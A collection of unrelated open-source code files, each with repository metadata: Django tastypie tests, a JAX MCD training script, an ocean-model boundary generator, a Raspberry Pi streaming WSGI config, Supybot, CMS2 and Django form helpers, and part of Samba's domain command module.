email='valid@exmaple.com',
password='junk'
)
data = {
# This URI is flat-out wrong (wrong resource).
# This should cause the request to fail.
'author': '/v1/notes/{0}/'.format(
note_1.pk
),
'title': 'Nopenopenope',
'slug': 'invalid-request',
'content': "This shouldn't work.",
'is_active': True,
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.set_body(json.dumps(data))
with self.assertRaises(NotFound) as cm:
nr.post_list(request)
self.assertEqual(str(cm.exception), "An incorrect URL was provided '/v1/notes/2/' for the 'UserResource' resource.")
self.assertEqual(Note.objects.count(), 2)
class PrefetchRelatedTests(TestCase):
def setUp(self):
self.forum = Forum.objects.create()
self.resource = api.canonical_resource_for('forum')
self.user_data = [
{
'username': 'valid but unique',
'email': 'valid.unique@exmaple.com',
'password': 'junk',
},
{
'username': 'valid and very unique',
'email': 'valid.very.unique@exmaple.com',
'password': 'junk',
},
{
'username': 'valid again',
'email': 'valid.very.unique@exmaple.com',
'password': 'junk',
},
]
def tearDown(self):
usernames = [data['username'] for data in self.user_data]
User.objects.filter(username__in=usernames).delete()
self.forum.delete()
def make_request(self, method):
request = MockRequest()
request.GET = {'format': 'json'}
request.method = method
request.set_body(json.dumps({
'members': [
self.user_data[0],
self.user_data[1],
],
'moderators': [self.user_data[2]],
}))
request.path = reverse('api_dispatch_detail', kwargs={
'pk': self.forum.pk,
'resource_name': self.resource._meta.resource_name,
'api_name': self.resource._meta.api_name
})
return request
def test_m2m_put(self):
request = self.make_request('PUT')
response = self.resource.put_detail(request)
self.assertEqual(response.status_code, 200)
data = json.loads(response.content.decode('utf-8'))
# Check that the query does what it's supposed to
# and only the return value is wrong
self.assertEqual(User.objects.count(), 3)
self.assertEqual(len(data['members']), 2)
self.assertEqual(len(data['moderators']), 1)
def test_m2m_patch(self):
request = self.make_request('PATCH')
response = self.resource.patch_detail(request)
self.assertEqual(response.status_code, 202)
data = json.loads(response.content.decode('utf-8'))
# Check that the query does what it's supposed to
# and only the return value is wrong
self.assertEqual(User.objects.count(), 3)
self.assertEqual(len(data['members']), 2)
self.assertEqual(len(data['moderators']), 1)
class ModelWithReverseItemsRelationshipTest(TestCase):
def test_reverse_items_relationship(self):
order_resource = OrderResource()
data = {
'name': 'order1',
'items': [
{
'name': 'car',
},
{
'name': 'yacht',
}
]
}
request = MockRequest()
request.GET = {'format': 'json'}
request.method = 'POST'
request.path = reverse('api_dispatch_list',
kwargs={'resource_name': order_resource._meta.resource_name,
'api_name': order_resource._meta.api_name})
request.set_body(json.dumps(data))
resp = order_resource.post_list(request)
self.assertEqual(resp.status_code, 201)
self.assertEqual(Order.objects.count(), 1)
self.assertEqual(OrderItem.objects.count(), 2)
class OneToOneTestCase(TestCase):
def test_reverse_one_to_one_post(self):
ed = ExtraData.objects.create(name='ed_name')
resource = TagResource()
# Post the extradata element which is attached to a "reverse" OneToOne
request = MockRequest()
request.method = "POST"
request.body = json.dumps({
"name": "tag_name",
"tagged": [],
"extradata": "/v1/extradata/%s/" % ed.pk
})
resp = resource.post_list(request)
# Assert that the status code is CREATED
self.assertEqual(resp.status_code, 201)
tag = Tag.objects.get(pk=int(resp['Location'].split("/")[-2]))
self.assertEqual(tag.extradata, ed)
|
ocadotechnology/django-tastypie
|
tests/related_resource/tests.py
|
Python
|
bsd-3-clause
| 39,916
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""FixMatch with Distribution Alignment and Adaptative Confidence Ratio.
"""
import os
import sys
from typing import Callable
import jax
import jax.numpy as jn
import objax
from absl import app
from absl import flags
from absl.flags import FLAGS
from objax.functional import softmax
from objax.typing import JaxArray
from semi_supervised.lib.data import MixData, CTAData
from semi_supervised.lib.train import TrainableSSLModule
from shared.data.fsl import DATASETS as FSL_DATASETS
from shared.data.ssl import DATASETS as SSL_DATASETS, DataSetSSL
from shared.train import ScheduleCos
from shared.util import setup_tf, MyParallel
from shared.zoo.models import network, ARCHS
class MCD(TrainableSSLModule):
def __init__(self, nclass: int, model: Callable, **kwargs):
super().__init__(nclass, kwargs)
self.model: objax.Module = model(colors=3, nclass=nclass, **kwargs)
self.model_ema = objax.optimizer.ExponentialMovingAverageModule(self.model, momentum=0.999)
if FLAGS.arch.endswith('pretrain'):
# Initialize weights of EMA with pretrained model's weights.
self.model_ema.ema.momentum = 0
self.model_ema.update_ema()
self.model_ema.ema.momentum = 0.999
self.c1: objax.Module = self.model[-1]
self.c2: objax.Module = objax.nn.Linear(self.c1.w.value.shape[0], nclass)
self.gen: objax.Module = self.model[:-1]
self.opt1 = objax.optimizer.Momentum(self.gen.vars() + self.c1.vars('c1') + self.c2.vars('c2'))
self.opt2 = objax.optimizer.Momentum(self.c1.vars('c1') + self.c2.vars('c2'))
self.opt3 = objax.optimizer.Momentum(self.gen.vars())
self.lr = ScheduleCos(self.params.lr, self.params.lr_decay)
@objax.Function.with_vars(self.model_ema.vars())
def eval_op(x: JaxArray) -> JaxArray:
return objax.functional.softmax(self.model_ema(x, training=False))
def get_two_outputs(v):
feat = self.gen(v, training=True)
return self.c1(feat), self.c2(feat)
def loss_function_phase1(x, y):
x1, x2 = get_two_outputs(x[:, 0])
xes = (objax.functional.loss.cross_entropy_logits(x1, y).mean() +
objax.functional.loss.cross_entropy_logits(x2, y).mean())
return xes, {'losses/xe': xes}
def loss_function_phase2(x, u, y):
saved = self.gen.vars().tensors()
x1, x2 = get_two_outputs(x[:, 0])
u1, u2 = get_two_outputs(u[:, 0])
self.gen.vars().assign(saved)
xes = (objax.functional.loss.cross_entropy_logits(x1, y).mean() +
objax.functional.loss.cross_entropy_logits(x2, y).mean())
dis = jn.abs(softmax(u1) - softmax(u2)).mean()
return xes - dis, {'losses/xe2': xes, 'losses/dis2': dis}
def loss_function_phase3(u):
u1, u2 = get_two_outputs(u[:, 0])
dis = jn.abs(softmax(u1) - softmax(u2)).mean()
return dis, {'losses/dis3': dis}
gv1 = objax.GradValues(loss_function_phase1, self.gen.vars() + self.c1.vars('c1') + self.c2.vars('c2'))
gv2 = objax.GradValues(loss_function_phase2, self.c1.vars('c1') + self.c2.vars('c2'))
gv3 = objax.GradValues(loss_function_phase3, self.gen.vars())
@objax.Function.with_vars(self.vars())
def train_op(step, x, y, u, probe=None):
y_probe = eval_op(probe) if probe is not None else None
p = step / (FLAGS.train_mimg << 20)
lr = self.lr(p)
g, v1 = gv1(x, y)
self.opt1(lr, objax.functional.parallel.pmean(g))
g, v2 = gv2(x, u, y)
self.opt2(lr, objax.functional.parallel.pmean(g))
v3 = {}
for _ in range(self.params.wu):
g, v = gv3(u)
for k, val in v[1].items():
v3[k] = v3.get(k, 0) + val / self.params.wu
self.opt3(lr, objax.functional.parallel.pmean(g))
self.model_ema.update_ema()
return objax.functional.parallel.pmean({'monitors/lr': lr, **v1[1], **v2[1], **v[1]}), y_probe
self.train_op = MyParallel(train_op, reduce=lambda x: x)
self.eval_op = MyParallel(eval_op)
def main(argv):
del argv
print('JAX host: %d / %d' % (jax.host_id(), jax.host_count()))
print('JAX devices:\n%s' % '\n'.join(str(d) for d in jax.devices()), flush=True)
setup_tf()
dataset_name, samples_per_class, dataset_seed = DataSetSSL.parse_name(f'{FLAGS.dataset}')
labeled = SSL_DATASETS()[dataset_name](samples_per_class, dataset_seed)
unlabeled = FSL_DATASETS()[f'{dataset_name}-0']()
testsets = [unlabeled.test]
module = MCD(labeled.nclass, network(FLAGS.arch),
lr=FLAGS.lr,
lr_decay=FLAGS.lr_decay,
wd=FLAGS.wd,
arch=FLAGS.arch,
batch=FLAGS.batch,
wu=FLAGS.wu,
uratio=FLAGS.uratio)
logdir = f'SSL/{FLAGS.dataset}/{FLAGS.augment}/{module.__class__.__name__}/%s' % (
'_'.join(sorted('%s%s' % k for k in module.params.items())))
logdir = os.path.join(FLAGS.logdir, logdir)
test = {}
for domain, testset in enumerate(testsets):
test.update((k, v.parse().batch(FLAGS.batch).nchw().map(lambda d: {**d, 'domain': domain}).prefetch(16))
for k, v in testset.items())
if FLAGS.augment.startswith('('):
train = MixData(labeled.train, unlabeled.train, labeled.nclass, FLAGS.batch, FLAGS.uratio)
elif FLAGS.augment.startswith('CTA('):
train = CTAData(labeled.train, unlabeled.train, labeled.nclass, FLAGS.batch, FLAGS.uratio)
else:
raise ValueError(f'Augment flag value {FLAGS.augment} not supported.')
module.train(FLAGS.train_mimg << 10, FLAGS.report_kimg, train, test, logdir, FLAGS.keep_ckpts)
train.stop()
objax.util.multi_host_barrier()
if __name__ == '__main__':
flags.DEFINE_enum('arch', 'wrn28-2', ARCHS, 'Model architecture.')
flags.DEFINE_float('lr', 0.03, 'Learning rate.')
flags.DEFINE_float('lr_decay', 0.25, 'Learning rate decay.')
flags.DEFINE_float('wd', 0.001, 'Weight decay.')
flags.DEFINE_integer('wu', 1, 'Iteration for phase3 (unlabeled weight loss for G).')
flags.DEFINE_integer('batch', 64, 'Batch size')
flags.DEFINE_integer('uratio', 3, 'Unlabeled batch size ratio')
flags.DEFINE_integer('report_kimg', 64, 'Reporting period in kibi-images.')
flags.DEFINE_integer('train_mimg', 8, 'Training duration in mega-images.')
flags.DEFINE_integer('keep_ckpts', 5, 'Number of checkpoints to keep (0 for all).')
flags.DEFINE_string('logdir', 'experiments', 'Directory where to save checkpoints and tensorboard data.')
flags.DEFINE_string('dataset', 'domainnet32_infograph(10,seed=1)', 'Data to train on.')
FLAGS.set_default('augment', 'CTA(sm,sm,probe=1)')
FLAGS.set_default('para_augment', 8)
app.run(main)
|
google-research/adamatch
|
semi_supervised/mcd.py
|
Python
|
apache-2.0
| 7,580
|
# -*- coding: utf-8 -*-
"""
Program to make bry nc file
okada on 2014/10/21
"""
import numpy as np
import pandas as pd
def ramp(zeta):
for i in xrange(744):
zeta[i] = zeta[i] * i / 744.0 + 150.0 * (1.0 - i / 744.0)
return zeta
def bry_zeta(dims, zetafile):
print 'bry_zeta:', zetafile
xi_rho = dims['xi']
eta_rho = dims['eta']
zeta = {}
zeta = pd.read_csv(zetafile, index_col='date')
for name in zeta.columns.values:
zeta[name] = ramp(zeta[name].values)
print zeta
th = len(zeta)
zeta_out = {}
zeta_out['w'] = np.ndarray(shape=[th, eta_rho])
zeta_out['s'] = np.ndarray(shape=[th, xi_rho])
for eta in xrange(eta_rho):
tk = zeta.tk.values / 100.0
ei = zeta.ei.values / 100.0
if eta < 68:
zeta_out['w'][:, eta] = ei
elif eta > 121:
zeta_out['w'][:, eta] = tk
else:
a = eta - 68
b = 121 - eta
zeta_out['w'][:, eta] = (a*tk + b*ei) / (a+b)
for xi in xrange(xi_rho):
ka = zeta.ka.values / 100.0
nu = zeta.nu.values / 100.0
if xi < 2:
zeta_out['s'][:, xi] = nu
elif 67 < xi:
zeta_out['s'][:, xi] = ka
else:
a = xi - 2
b = 67 - xi
zeta_out['s'][:, xi] = (a*ka + b*nu) / (a+b)
return zeta_out
if __name__ == '__main__':
HOME = ''
dims = {'xi':117, 'eta':124, 's':20}
zetafile = 'F:/okada/Dropbox/Data/zeta_op_2012.csv'
zeta = bry_zeta(dims, zetafile)
def plot():
import matplotlib.pyplot as plt
#plt.pcolor(zeta['s'][:200,:])
plt.plot(zeta['w'][:200,68])
plt.plot(zeta['w'][:200,120])
plt.plot(zeta['s'][:200,3])
plt.plot(zeta['s'][:200,67])
plt.show()
plot()
|
okadate/romspy
|
romspy/make/boundary/bry_zeta.py
|
Python
|
mit
| 1,889
|
"""
WSGI config for pacemPI project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/dev/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pacemPI.settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
def on_startup():
os.system("mkdir /tmp/stream 2> /dev/null")
os.system("raspistill -w 640 -h 480 -q 20 -o /tmp/stream/pic.jpg -tl 50 -t 99999999 2> /dev/null &")
os.system("""sudo cp /home/pi/mjpg-streamer-code-182/mjpg-streamer/output_http.so /home/pi/mjpg-streamer-code-182/mjpg-streamer/input_file.so /usr/local/lib/ 2>/dev/null""")
os.system("""LD_LIBRARY_PATH=/usr/local/lib mjpg_streamer -i "input_file.so -f /tmp/stream -n pic.jpg" -o "output_http.so -w /usr/local/www" &""")
on_startup()
|
AngelTsanev/pacemPI
|
pacemPI/wsgi.py
|
Python
|
mit
| 906
|
###
# Copyright (c) 2004-2005, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
"""
Basic channel management commands. Many of these commands require their caller
to have the <channel>.op capability. This plugin is loaded by default.
"""
import supybot
import supybot.world as world
# Use this for the version of this plugin. You may wish to put a CVS keyword
# in here if you\'re keeping the plugin in CVS or some similar system.
__version__ = "%%VERSION%%"
__author__ = supybot.authors.jemfinch
# This is a dictionary mapping supybot.Author instances to lists of
# contributions.
__contributors__ = {
supybot.authors.skorobeus: ['enable', 'disable'],
}
import config
import plugin
reload(plugin) # In case we're being reloaded.
if world.testing:
import test
Class = plugin.Class
configure = config.configure
|
tecan/xchat-rt
|
plugins/scripts/Supybot-0.83.4.1-bitcoinotc-bot/plugins/Channel/__init__.py
|
Python
|
gpl-2.0
| 2,341
|
import os,shutil
from datetime import datetime,timedelta
class create_cms2_files:
def __init__(self,time,cmsdir='',nproc=4,outdir='%Y/%m/%d/%H%M/',tempmodel='model1',axi=[],pol=[],start=1):
"""Sets up initial variables to pass to rest of create_model_cms_files functions.
Really only need to set the input time string "YYYY/MM/DD HH:MM:SS" and possibly the path to the CMS2 directory (assuming you downloaded git repo in cms2 directory then cmsdir vairable already).
Then assuming you set up the sigmoid directory to be YYYY/MM/DD/HHMM (can change with outdir variable if needed) you are set."""
if cmsdir == '': cmsdir = open('cms2_dir','r').readlines()[0][:-1]#read in first line of cms2_dir and format to send to script
if cmsdir[-1] != '/': cmsdir=cmsdir+'/'
self.time = time
self.nproc = nproc
self.sform = '%Y/%m/%d %H:%M:%S'
self.dttime = datetime.strptime(self.time,self.sform)
self.basedir = datetime.strftime(self.dttime,outdir)
self.cmsdir = cmsdir
self.tempmodel = tempmodel # template model
self.axi = axi
self.pol = pol
self.start = start
#Potential model parameters
def setup_file(self):
template = self.cmsdir+self.basedir+self.tempmodel+'_setup'
for i in range(self.start,self.nparam):
#make sure template is not the same file as copying to
if template != self.cmsdir+self.basedir+self.tempmodel.replace('1',str(i))+'_setup':
shutil.copy(template,self.cmsdir+self.basedir+self.tempmodel.replace('1',str(i))+'_setup')
#copy path files after 1st one is complete
def path_file(self):
#get number of lines in file
pathf = open(self.cmsdir+self.basedir+self.tempmodel+"_path",'r')
flines = len(pathf.readlines())
#initalize text variable
pathtxt = ""
#path for fluxrope file
pathf = open(self.cmsdir+self.basedir+self.tempmodel+"_path",'r')
#loop through file and create large text block
for j,i in enumerate(pathf):
#if j == 1: i = i[:-12]+'{0}'+'\n'
if ((j == flines-2) | (j == flines-3)):i = i[:-12]+'{1:6.5e}\n'
if (j == 1): i = i[:25]+' {0:6.5e}\n'
pathtxt = pathtxt+i
#model parameters
if len(self.pol) == 0:
pol = ['1.00000E9','5.00000E9','1.00000E10','5.00000E10','1.00000E11']
#Updated per conversation with antonia 2017/04/03
if len(self.axi) == 0:
axi = ['1.00000e19','3.00000e19','5.00000e19','7.00000e19','9.00000e19','1.00000e20','3.00000e20','5.00000e20','7.00000e20','9.00000e20','1.00000e21','1.50000e21']
i = self.start
for p in self.pol:
for a in self.axi:
run = True
#remove early 7E20 models for some reason unknown to me
if ((float(p) < 9e9) & (a == '7.00000e20')): run = False
if run:
files = open(self.cmsdir+self.basedir+self.tempmodel.replace('1',str(i))+"_path",'w')
files.write(pathtxt.format(float(p),float(a)))
files.close()
i+=1
self.nparam = i #get number of models to create
#text format for input file
def model_input(self):
modin = self.basedir+"\n"
modin = modin+"11 \n"
modin = modin+"model{0} \n"
modin = modin+"0 \n"
modin = modin+"100 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"model{0} \n"
modin = modin+"100 \n"
modin = modin+"900 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.003 \n"
modin = modin+"model{0} \n"
modin = modin+"1000 \n"
modin = modin+"9000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.001 \n"
modin = modin+"model{0} \n"
modin = modin+"10000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0003 \n"
modin = modin+"model{0} \n"
modin = modin+"20000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0001 \n"
modin = modin+"model{0} \n"
modin = modin+"30000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0001 \n"
modin = modin+"model{0} \n"
modin = modin+"40000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0001 \n"
modin = modin+"model{0} \n"
modin = modin+"50000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0001 \n"
modin = modin+"model{0} \n"
modin = modin+"60000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0001 \n"
modin = modin+"model{0} \n"
modin = modin+"70000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0001 \n"
modin = modin+"model{0} \n"
modin = modin+"80000 \n"
modin = modin+"10000 \n"
modin = modin+"0 \n"
modin = modin+"0 \n"
modin = modin+"0.0001 \n"
# what to write out the file as
filetime = datetime.strftime(self.dttime,'input%y%m%d%H%M%S_mod')
#create input files
for i in range(self.start,self.nparam):
files = open(self.cmsdir+self.basedir+filetime+"{0}.dat".format(str(i)),'w')
files.write(modin.format(str(i)))
files.close()
#run creation on all files
def create_all_files(self):
self.path_file()
self.setup_file()
self.model_input()
|
jprchlik/cms2_python_helpers
|
create_model_files.py
|
Python
|
mit
| 7,124
|
from django import forms
from falta.models import *
from cfar.utils import *
class JustificativaForm(forms.ModelForm):
class Meta:
model = Justificativa
fields = ('url','tipo_justificativa','faltas')
class AntecipacaoForm(forms.ModelForm):
class Meta:
model = Antecipacao
fields = ('agendamento', 'url', 'horarios')
class ReposicaoForm(forms.ModelForm):
class Meta:
model = Reposicao
fields = ('agendamento', 'url', 'faltas')
class AgendamentoForm(forms.ModelForm):
class Meta:
model = Agendamento
fields = ('tipo','dia', 'materia_corrente')
|
diaspa-nds/cfar
|
falta/forms.py
|
Python
|
gpl-2.0
| 655
|
# domain management
#
# Copyright Matthias Dieter Wallnoefer 2009
# Copyright Andrew Kroeger 2009
# Copyright Jelmer Vernooij 2007-2012
# Copyright Giampaolo Lauria 2011
# Copyright Matthieu Patou <mat@matws.net> 2011
# Copyright Andrew Bartlett 2008-2015
# Copyright Stefan Metzmacher 2012
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import print_function
from __future__ import division
import samba.getopt as options
import ldb
import os
import sys
import ctypes
import random
import tempfile
import logging
import subprocess
import time
import shutil
from samba import ntstatus
from samba import NTSTATUSError
from samba import werror
from getpass import getpass
from samba.net import Net, LIBNET_JOIN_AUTOMATIC
from samba import enable_net_export_keytab
import samba.ntacls
from samba.join import join_RODC, join_DC
from samba.auth import system_session
from samba.samdb import SamDB, get_default_backend_store
from samba.ndr import ndr_pack, ndr_print
from samba.dcerpc import drsuapi
from samba.dcerpc import drsblobs
from samba.dcerpc import lsa
from samba.dcerpc import netlogon
from samba.dcerpc import security
from samba.dcerpc import nbt
from samba.dcerpc import misc
from samba.dcerpc.samr import DOMAIN_PASSWORD_COMPLEX, DOMAIN_PASSWORD_STORE_CLEARTEXT
from samba.netcmd import (
Command,
CommandError,
SuperCommand,
Option
)
from samba.netcmd.fsmo import get_fsmo_roleowner
from samba.netcmd.common import netcmd_get_domain_infos_via_cldap
from samba.samba3 import Samba3
from samba.samba3 import param as s3param
from samba.upgrade import upgrade_from_samba3
from samba.drs_utils import drsuapi_connect
from samba import remove_dc, arcfour_encrypt, string_to_byte_array
from samba.auth_util import system_session_unix
from samba.dsdb import (
DS_DOMAIN_FUNCTION_2000,
DS_DOMAIN_FUNCTION_2003,
DS_DOMAIN_FUNCTION_2003_MIXED,
DS_DOMAIN_FUNCTION_2008,
DS_DOMAIN_FUNCTION_2008_R2,
DS_DOMAIN_FUNCTION_2012,
DS_DOMAIN_FUNCTION_2012_R2,
DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL,
DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL,
UF_WORKSTATION_TRUST_ACCOUNT,
UF_SERVER_TRUST_ACCOUNT,
UF_TRUSTED_FOR_DELEGATION,
UF_PARTIAL_SECRETS_ACCOUNT
)
from samba.provision import (
provision,
ProvisioningError,
DEFAULT_MIN_PWD_LENGTH,
setup_path
)
from samba.provision.common import (
FILL_FULL,
FILL_NT4SYNC,
FILL_DRS
)
from samba.netcmd.pso import cmd_domain_passwordsettings_pso
from samba.netcmd.domain_backup import cmd_domain_backup
from samba.common import get_string
string_version_to_constant = {
"2008_R2": DS_DOMAIN_FUNCTION_2008_R2,
"2012": DS_DOMAIN_FUNCTION_2012,
"2012_R2": DS_DOMAIN_FUNCTION_2012_R2,
}
common_provision_join_options = [
Option("--machinepass", type="string", metavar="PASSWORD",
help="choose machine password (otherwise random)"),
Option("--plaintext-secrets", action="store_true",
help="Store secret/sensitive values as plain text on disk" +
"(default is to encrypt secret/ensitive values)"),
Option("--backend-store", type="choice", metavar="BACKENDSTORE",
choices=["tdb", "mdb"],
help="Specify the database backend to be used "
"(default is %s)" % get_default_backend_store()),
Option("--backend-store-size", type="bytes", metavar="SIZE",
help="Specify the size of the backend database, currently only " +
"supported by lmdb backends (default is 8 Gb)."),
Option("--targetdir", metavar="DIR",
help="Set target directory (where to store provision)", type=str),
Option("-q", "--quiet", help="Be quiet", action="store_true"),
]
common_join_options = [
Option("--server", help="DC to join", type=str),
Option("--site", help="site to join", type=str),
Option("--domain-critical-only",
help="only replicate critical domain objects",
action="store_true"),
Option("--dns-backend", type="choice", metavar="NAMESERVER-BACKEND",
choices=["SAMBA_INTERNAL", "BIND9_DLZ", "NONE"],
help="The DNS server backend. SAMBA_INTERNAL is the builtin name server (default), "
"BIND9_DLZ uses samba4 AD to store zone information, "
"NONE skips the DNS setup entirely (this DC will not be a DNS server)",
default="SAMBA_INTERNAL"),
Option("-v", "--verbose", help="Be verbose", action="store_true")
]
common_ntvfs_options = [
Option("--use-ntvfs", help="Use NTVFS for the fileserver (default = no)",
action="store_true")
]
def get_testparm_var(testparm, smbconf, varname):
errfile = open(os.devnull, 'w')
p = subprocess.Popen([testparm, '-s', '-l',
'--parameter-name=%s' % varname, smbconf],
stdout=subprocess.PIPE, stderr=errfile)
(out, err) = p.communicate()
errfile.close()
lines = out.split(b'\n')
if lines:
return get_string(lines[0]).strip()
return ""
try:
enable_net_export_keytab()
except ImportError:
cmd_domain_export_keytab = None
else:
class cmd_domain_export_keytab(Command):
"""Dump Kerberos keys of the domain into a keytab."""
synopsis = "%prog <keytab> [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"credopts": options.CredentialsOptions,
"versionopts": options.VersionOptions,
}
takes_options = [
Option("--principal", help="extract only this principal", type=str),
]
takes_args = ["keytab"]
def run(self, keytab, credopts=None, sambaopts=None, versionopts=None, principal=None):
lp = sambaopts.get_loadparm()
net = Net(None, lp)
net.export_keytab(keytab=keytab, principal=principal)
class cmd_domain_info(Command):
"""Print basic info about a domain and the DC passed as parameter."""
synopsis = "%prog <ip_address> [options]"
takes_options = [
]
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"credopts": options.CredentialsOptions,
"versionopts": options.VersionOptions,
}
takes_args = ["address"]
def run(self, address, credopts=None, sambaopts=None, versionopts=None):
lp = sambaopts.get_loadparm()
try:
res = netcmd_get_domain_infos_via_cldap(lp, None, address)
except RuntimeError:
raise CommandError("Invalid IP address '" + address + "'!")
self.outf.write("Forest : %s\n" % res.forest)
self.outf.write("Domain : %s\n" % res.dns_domain)
self.outf.write("Netbios domain : %s\n" % res.domain_name)
self.outf.write("DC name : %s\n" % res.pdc_dns_name)
self.outf.write("DC netbios name : %s\n" % res.pdc_name)
self.outf.write("Server site : %s\n" % res.server_site)
self.outf.write("Client site : %s\n" % res.client_site)
class cmd_domain_provision(Command):
"""Provision a domain."""
synopsis = "%prog [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
}
takes_options = [
Option("--interactive", help="Ask for names", action="store_true"),
Option("--domain", type="string", metavar="DOMAIN",
help="NetBIOS domain name to use"),
Option("--domain-guid", type="string", metavar="GUID",
help="set domainguid (otherwise random)"),
Option("--domain-sid", type="string", metavar="SID",
help="set domainsid (otherwise random)"),
Option("--ntds-guid", type="string", metavar="GUID",
help="set NTDS object GUID (otherwise random)"),
Option("--invocationid", type="string", metavar="GUID",
help="set invocationid (otherwise random)"),
Option("--host-name", type="string", metavar="HOSTNAME",
help="set hostname"),
Option("--host-ip", type="string", metavar="IPADDRESS",
help="set IPv4 ipaddress"),
Option("--host-ip6", type="string", metavar="IP6ADDRESS",
help="set IPv6 ipaddress"),
Option("--site", type="string", metavar="SITENAME",
help="set site name"),
Option("--adminpass", type="string", metavar="PASSWORD",
help="choose admin password (otherwise random)"),
Option("--krbtgtpass", type="string", metavar="PASSWORD",
help="choose krbtgt password (otherwise random)"),
Option("--dns-backend", type="choice", metavar="NAMESERVER-BACKEND",
choices=["SAMBA_INTERNAL", "BIND9_FLATFILE", "BIND9_DLZ", "NONE"],
help="The DNS server backend. SAMBA_INTERNAL is the builtin name server (default), "
"BIND9_FLATFILE uses bind9 text database to store zone information, "
"BIND9_DLZ uses samba4 AD to store zone information, "
"NONE skips the DNS setup entirely (not recommended)",
default="SAMBA_INTERNAL"),
Option("--dnspass", type="string", metavar="PASSWORD",
help="choose dns password (otherwise random)"),
Option("--root", type="string", metavar="USERNAME",
help="choose 'root' unix username"),
Option("--nobody", type="string", metavar="USERNAME",
help="choose 'nobody' user"),
Option("--users", type="string", metavar="GROUPNAME",
help="choose 'users' group"),
Option("--blank", action="store_true",
help="do not add users or groups, just the structure"),
Option("--server-role", type="choice", metavar="ROLE",
choices=["domain controller", "dc", "member server", "member", "standalone"],
help="The server role (domain controller | dc | member server | member | standalone). Default is dc.",
default="domain controller"),
Option("--function-level", type="choice", metavar="FOR-FUN-LEVEL",
choices=["2000", "2003", "2008", "2008_R2"],
help="The domain and forest function level (2000 | 2003 | 2008 | 2008_R2 - always native). Default is (Windows) 2008_R2 Native.",
default="2008_R2"),
Option("--base-schema", type="choice", metavar="BASE-SCHEMA",
choices=["2008_R2", "2008_R2_old", "2012", "2012_R2"],
help="The base schema files to use. Default is (Windows) 2012_R2.",
default="2012_R2"),
Option("--next-rid", type="int", metavar="NEXTRID", default=1000,
help="The initial nextRid value (only needed for upgrades). Default is 1000."),
Option("--partitions-only",
help="Configure Samba's partitions, but do not modify them (ie, join a BDC)", action="store_true"),
Option("--use-rfc2307", action="store_true", help="Use AD to store posix attributes (default = no)"),
]
ntvfs_options = [
Option("--use-xattrs", type="choice", choices=["yes", "no", "auto"],
metavar="[yes|no|auto]",
help="Define if we should use the native fs capabilities or a tdb file for "
"storing attributes likes ntacl when --use-ntvfs is set. "
"auto tries to make an inteligent guess based on the user rights and system capabilities",
default="auto")
]
